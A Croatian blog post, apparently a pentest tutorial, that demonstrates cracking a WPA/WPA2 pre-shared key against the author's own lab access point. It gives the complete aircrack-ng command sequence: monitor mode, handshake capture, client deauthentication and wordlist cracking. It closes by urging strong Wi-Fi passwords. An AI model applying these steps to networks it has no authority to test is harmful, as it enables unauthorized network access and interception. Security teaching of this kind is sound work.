Tuesday 24 July 2012

WPA/WPA2 PSK bruteforcing

WPA ili Wifi Protected Access je sigurnosni protokol koji je nadogradnja WEP-a nakon što su u njemu otkrivene slabosti. Također, većina uređaja je dobila WPA samo softverskom nadogradnjom. WPA koristi TKIP enkripcijski algoritam dok WPA2 koji je nadogradnja na WPA koristi AES-CCMP koji je jači i robustniji nego TKIP.

No WPA/WPA2 protokoli su ranjivi na bruteforce dictionary napade jer napadač koji sluša razgovor između Access Pointa i klijenta može saznati sve podatke koji su mu potrebni za bruteforcanje PSK-a (WPA handshake, SSID, authenticator nounce, supplicant nounce, authenticator MAC, supplicant MAC)

Za demonstraciju napada pripremljen je AP s jednostavnim passwordom i SSID-em PENtestLAB.

Na omiljenoj pentest distribuciji moramo prvo pokrenuti airmon:
 airmon-ng start wlan0
NAkon toga sve radimo sa interfaceom mon0. Pokrećemo airodump da nadjemo podatke o našem SSID-u koji ćemo napasti:

 airodump-ng mon0

Nakon što smo saznali BSSID, pokrećemo airodump tako da monitorira kanal na kojem je naš AP:
airodump-ng –bssid 62:A6:D9:99:F3:7f --channel 2 -w pentestlab mon0

Sada je potrebno pričekati dok se neki klijent ne spoji ili ako je klijent već spojen, možemo ga prisiliti da se odspoji:
  aireplay-ng -0 5 -a 62:A6:D9:99:F3:7f mon0
Uhvatili smo WPA handshake:


Sada možemo krenuti u probijanje PSK-a sa aircrackom:
aircrack-ng pentestlab-01.cap -w /media/test/passuniq.txt
 I ukoliko nam se PSK poklapa s nekim iz našeg riječnika, dobiti ćemo key:


Nadam se da ovaj tutorial demonstrira zašto je potrebno koristiti duge i komplicirane passworde kod štićenja bežičnih mreža.

No comments:

Post a Comment